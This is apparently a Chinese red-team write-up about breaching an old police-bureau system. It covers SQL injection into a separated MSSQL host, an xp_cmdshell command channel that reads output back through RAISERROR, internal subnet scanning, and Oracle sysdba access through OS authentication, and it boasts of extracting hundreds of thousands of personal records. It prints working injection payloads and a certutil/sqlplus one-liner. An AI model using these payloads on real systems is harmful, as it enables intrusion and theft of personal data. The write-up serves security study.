文章总结: 本文分享一次针对某市公安局老系统的渗透实战过程,涉及站库分离环境下的SQL注入利用、将注入点改造为HTTP通道实现内网命令执行、内网存活主机测绘、Oracle数据库OS认证提权,最终获取数十万条住宿及人员敏感数据。文章强调未授权攻击属非法行为,仅供技术经验分享。 综合评分: 45 文章分类: 渗透测试,红队,内网渗透
某次护网站库分离不出网横向仅一台实纪
原创
zkaq-石英 zkaq-石英
掌控安全EDU
2026年9月13日 12:19 江西
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
扫码领资料
获网安教程
本文由掌控安全学院 – 石英 投稿
来Track安全社区投稿~
千元稿费!还有保底奖励~( https://bbs.zkaq.cn )****
文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果自行承担!
其实整体过程虽然曲折,但是好在拿了一些分,所以给大家分享一下。
打的是某市公安局很老的一个系统,当时的大概整体过程如下
- 从互联网进来后先撞上站库分离:注入点的 xp_cmdshell 实际跑在内网数据库主机 192.168.2.6 上,公网只是 NAT 映射入口
- 内网 DB 主机无默认路由、无 DNS、网络层彻底隔离,反弹 shell / 工具回传全不可行 —— 于是把 SQL 注入点改造成准 C2:一条”命令写临时表 + RAISERROR 回显”的两步 HTTP 通道做交互式命令执行,内网测绘全程走这条 HTTP 通道完成;
- 内网测绘手法全靠注入通道执行
ipconfig / route print / arp -a / net view / nslookup,再用 C# 编译的小工具做全子网存活扫描,还识别出透明代理对 SMTP/POP/IMAP 出站端口的”伪象 OPEN”(不存在的主机上 25/110/143 全”通”),避免把假端口当真目标; - 跨数据库类型提权:SYSTEM → 本机 Oracle 11g OS 认证
sqlplus / as sysdba→ 全库控制 → 旅馆业住宿 43.9 万 + 人员 35.4 万 + 身份证 5 万,百万级 PII(1.1 十万级+); - 后端是一条线打满:未授权 → SQLi(sa) → 站库分离 → SYSTEM → Oracle sysdba → 后台明文口令 → 双库控制 → 内网横向 2.x。
好在是拿到了几十万数据分,不然废了半天劲可就打水漂了
话不多说
首先是前端 js 扫了下接口,然后测试发现一个报错注入点
然后我就直接上 sqlmap 了,嗯,不出意外的直接把连接池扫崩了,我真是服了啊,最后等了一个钟头,只能老老实实手测
不过手测也并不顺利,好消息是可以 xp_cmd
但是因为执行的过程默认不回显(执行成功就不显示报错了),所以就把命令结果写入临时表,在通过报错读出来
第一步,写入临时表的 poc
';DELETE FROM dw_tmp;INSERT INTO dw_tmp EXEC master..xp_cmdshell 'whoami';--
读取结果的命令
';DECLARE @x nvarchar(4000);SET @x='';SELECT @x=@x+ISNULL(o,'')+CHAR(10) FROM dw_tmp WHERE o NOT LIKE '%SystemDrive%';SELECT @x=REPLACE(@x,'%','%%');RAISERROR(@x,16,1);--
然后就找 ai 大人写了个脚本,嗯,这样就方便多了
本来到这里都以为已经游戏结束了,然后发现不出网,DNS 通道都不出,然后又开始探测 web 目录,最后折腾了半天发现是站库分离
没办法只能开始尝试横向,看了下路由表,嗯,无收获,无默认路由、无其他网段、IP 转发=否
nslookup .1/.3/.6 全部无响应(无 DNS 服务器)
net view /all /domain 无输出 → 无域、无可见共享(WORKGROUP)
没办法,不出网工具搞不进去,好在是有 C#
所以现场编译了个全子网存活扫描
在 .6 上 D:\tmp\ 编译 C# 小程序做 ICMP + TCP 全子网探测:
最后全子网仅 2 台存活主机192.168.2.3(web)+ 192.168.2.6(DB)
在对 2.3 尝试了半天发现无果之后只好将目标转会到本机的其他服务,这时候也算是峰回路转了
发现本机还有台 Oracle, 然后因为Oracle 配了OS 认证(sqlnet.ora SQLNET.AUTHENTICATION_SERVICES 允许),SYSTEM 进程用 sqlplus -s / as sysdba 免密登 sysdba。
然后经过一番探测,发现了存有住客记录的表格,也是发现了几十万三要素,没白来没白来
整合命令
echo c2V0IGhlYWRpbmcgb2ZmOwpzZXQgZmVlZGJhY2sgb2ZmOwpzZXQgbGluZXNpemUgMzAwOwpzZWxlY3QgWE18fGNocigxMjQpfHxHTVNGSE18fGNocigxMjQpfHxTSkhNfHxjaHIoMTI0KXx8VFhaSE18fGNocigxMjQpfHxDU1JRIGZyb20gTEdZUVQuUllKQlhYIHdoZXJlIHJvd251bTw9MzsKc2VsZWN0IG93bmVyfHwnLid8fHRhYmxlX25hbWV8fCc6J3x8bnVtX3Jvd3MgZnJvbSBhbGxfdGFibGVzIHdoZXJlIG93bmVyIGluICgnTEdZUVQnLCdDU1paQkInLCdLRFknLCdVQVYnKSBhbmQgbnVtX3Jvd3M+NTAwIG9yZGVyIGJ5IG51bV9yb3dzIGRlc2M7CmV4aXQ7Cg== > D:\tmp\q.b64 & certutil -decode -f D:\tmp\q.b64 D:\tmp\q.sql & D:\app\******\sqlplus.exe -s / as sysdba @D:\tmp\q.sql & del D:\tmp\q.b64
补充:接管前台 WEB 之后发现里面没有上传点(烦死了)!!!
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
分享本文到朋友圈,可以凭截图找老师领取
上千教程+工具+交流群+靶场账号哦
分享后扫码加我!
回顾往期内容
网络安全人员必考的几本证书!
文库|内网神器cs4.0使用说明书
重生HW之感谢客服小姐姐带我进入内网遨游
手把手教你CNVD漏洞挖掘 + 资产收集
【精选】SRC快速入门+上分小秘籍+实战指南
代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!
点赞+在看支持一下吧~感谢看官老爷~
你的点赞是我更新的动力
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:掌控安全EDU zkaq-石英 zkaq-石英《某次护网站库分离不出网横向仅一台实纪》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论